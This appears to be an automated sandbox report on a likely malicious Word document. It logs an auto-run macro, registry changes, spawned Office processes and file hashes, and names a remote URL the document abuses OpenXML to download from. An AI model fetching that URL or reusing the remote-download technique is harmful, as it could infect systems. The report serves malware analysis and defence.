Malware Analysis Report

2025-01-22 19:16

Sample ID 240722-qtt2sszcng
Target 635e0b3decdc6bd51760fddf495b9527_JaffaCakes118
SHA256 de955cceb338ca2def37a9273435e0a238fa80f4867854141738c9cc47b38eaf
Tags
macro macro_on_action
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

de955cceb338ca2def37a9273435e0a238fa80f4867854141738c9cc47b38eaf

Threat Level: Likely malicious

The file 635e0b3decdc6bd51760fddf495b9527_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

macro macro_on_action

Office macro that triggers on suspicious action

Suspicious Office macro

Abuses OpenXML format to download file from external location

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-22 13:33

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 13:33

Reported

2024-07-22 13:42

Platform

win7-20240708-en

Max time kernel

144s

Max time network

137s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc"

Signatures

Abuses OpenXML format to download file from external location

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\Common\Offline\Files\https://khalilmouna.com/docs/count.xls?ZhEH_H437018.635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\14.0\Common C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\Common\Offline\Files\https://khalilmouna.com/docs/count.xls?ZhEH_H437018.635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\Common\Offline\Files\https://khalilmouna.com/docs/count.xls?ZhEH_H437018.635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{976B17CD-8F6A-409D-ADCA-8D9AB2E7369A}\2.0\HELPDIR C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{976B17CD-8F6A-409D-ADCA-8D9AB2E7369A} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{976B17CD-8F6A-409D-ADCA-8D9AB2E7369A}\2.0\FLAGS\ = "6" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 khalilmouna.com udp

Files

memory/1056-0-0x000000002FCB1000-0x000000002FCB2000-memory.dmp

memory/1056-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1056-2-0x0000000070C1D000-0x0000000070C28000-memory.dmp

memory/1056-11-0x0000000070C1D000-0x0000000070C28000-memory.dmp

memory/1056-61-0x0000000004710000-0x0000000004810000-memory.dmp

memory/1056-62-0x000000000D5F0000-0x000000000D6F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{F91EA32F-88C0-4AD9-833F-2593C2F8B5E8}

MD5 1c4ab7ce5e13fa3fb80e28c7206b50f8
SHA1 14d696e67904b3aa191fe869590df0409b8870ea
SHA256 15e209f71e49b39bcb850db8dc95f86098aa4e08c953ff959a54def69bc5a63a
SHA512 ce1a3b5a9fdafa9e2c7b38715ffd739aeac911edcfb94753cb3509a2ff1dcc89241a5af998fcdc2051cd7f895a1ad55fc33bfeaef14f0bba3699d64575ba0b8b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{51EA5863-5FCC-48B4-A95D-601C577EBDEE}.FSD

MD5 1478a60112050bcc41f898d613513458
SHA1 a0cc8cadf957d18fec2d796b05971d7d1838904d
SHA256 65620352aa20a067bc426f7816083868d2a279c3305c1f423d37f13609e7fd26
SHA512 b90f57420286da2035ad28847b8f90ea46bac1fdd59e27ef8eb9493afdde701a0e52a8f73241804a62c28f473cb0d30bc707b141f66ddfafe07d7853ced2f9ff

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 04005461551595d0fdc7a2730840fbf5
SHA1 5bd1f291765b043c91de2ce1980a04f4dc4efe62
SHA256 5b2e8faae5ea6af2ce7336e93d37571595d149696469d44c985b4cadb35d8431
SHA512 b9877cf3c572d4aed9bb3067692176e9f8dcc3fda1f8fcf74e3c715ffa43780e020a6e8599245260f3dbaa2661ba31683d8cf16639a72ec8bbee97dd0eb4538c

C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl

MD5 1ed6d4ceec6b270c291a717d3cdca011
SHA1 4b798c2ce8a2552f5e7fcd0d077965a8176aa37d
SHA256 99dbaca5077cddc5064eb35a99d681d1dcc021db5cb205c51f4413cfd90c329c
SHA512 240023e06c6bcbccb2b849f87553606e9d8cdc811e45024761055d0eaffba90042080004fc80950ee2103021715a61b8a3bb8c51d6de3a8bfbb6098b4f7b852b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{12B16580-4727-46EC-8683-F92E77A2A27A}.FSD

MD5 b533a3f2dffa47e62714526ad06b5e22
SHA1 57b86c25c9af6509121a0355c8a55108c083f705
SHA256 2115b8121eac72728f00d820e64dc7897ad09c55925760bba28b22bbe2f4bcb9
SHA512 f8aeea20c06a23d2fd5c979a77664249b19cbbd071d3d51a2255992e2a6e5d87b63b9f192ccda8e0121aea89bb7b4c2424a02b6ccb66ebb07d12d06e2b940ac6

memory/308-1031-0x000000005FFF0000-0x0000000060000000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 99c2a895b4a8535ffe387bb83239b5e4
SHA1 f24e05dd753a2d19a69299f4ae2c2ae12840beac
SHA256 b20d7714c9b146884c6aa7f86e1babed168ad3b8a84b8b9105dbc314fc8d1536
SHA512 a3b4ffe7960ac957401c51d6d9727198a76b8907b173201ea5c25221e9f03d8d4c141f99ccf424b27e69e7098947aca9e33565c674c0023b8d2ca7a4d2fd14be

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd

MD5 34f6886eb5cf9c1c427496082e60523b
SHA1 dbb0c9b2283335aa762361f45d86923379ec4c41
SHA256 97000873a4edccce3e287a772f9c52351ada80394562917a4fbba2f00a2ab5f3
SHA512 974510e1dfeb12b2835e5fb8289f382f3b46481517077bbfc02282cd4e96b065b7add05869b488e4a2c4dc9467d6fc2106e7bc7e9a942bd5565df695fb098b3b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

MD5 c28741851ecc1e35f9f0a6d3f4d1754d
SHA1 a3c20b98f76dd9eaf8ccb9dd81996cc6f3aeb157
SHA256 e1b73d684c063bfcd8bdf7d403f0251acc84717dc63aa2e0005b4b87113f7f47
SHA512 d0933d0ecb006ae10729f07614459585690c2b10b3f4d5ea04d80cafbbd70792c495770a9b779202f7c958476a765107c629ff3d626b5196f0bbf8620256b9e1

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

MD5 f2d4cdbed5decab87fff69b92c97dd34
SHA1 16c2bc09d3e53b69a0d260a103151485bb2de6c1
SHA256 eb59f6e7d80085d8274ff58ef8b3e3e1222e7e3ee84ba593c037d33c858c0cd8
SHA512 e119ea1b46e24a6aca15e28162b6faf2ced92365a3fb811bcbaaeb50c2a9de3eea5f0688a1044f26a5fcbeaaec86f9717acb03d13f9ad5f099caecebc1847218

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{51EA5863-5FCC-48B4-A95D-601C577EBDEE}.FSD

MD5 f7c8295ebe306ddac34ad8dc3bb09b84
SHA1 3ed6a8e183c09de346e3ea54f1b1b1b09fe1938e
SHA256 765109674aa0e49a59b25b5612ddce420fd3554920a2723ce4789afbb8f9c043
SHA512 4ac0050cd65e405f4335706bd0b2a03e677a2f405f2fbe0b3297f2cd7bdd45c5b0f5a8bfe48d9cdd87d345381b20490f3cdf38c26afecf62c5d2b2f1d28e6da1

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

MD5 2a057c3a13f7ccab1e31a7a727defdf6
SHA1 341c8f3b35cc09be1d1fc0d2cff1470d7abbd117
SHA256 66be60a530d245ff71d9e13c25eb529187cf89e8fb99fd527c5d5e6e6484316e
SHA512 87ac4a130a67724b0481d65c953b9a2593301438f80bd29d0186b399c22756616c161656533596d494c2a080f4ef4156d5f7d8847edb396e89347a1422021ad3

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-22 13:33

Reported

2024-07-22 13:40

Platform

win10v2004-20240709-en

Max time kernel

144s

Max time network

127s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
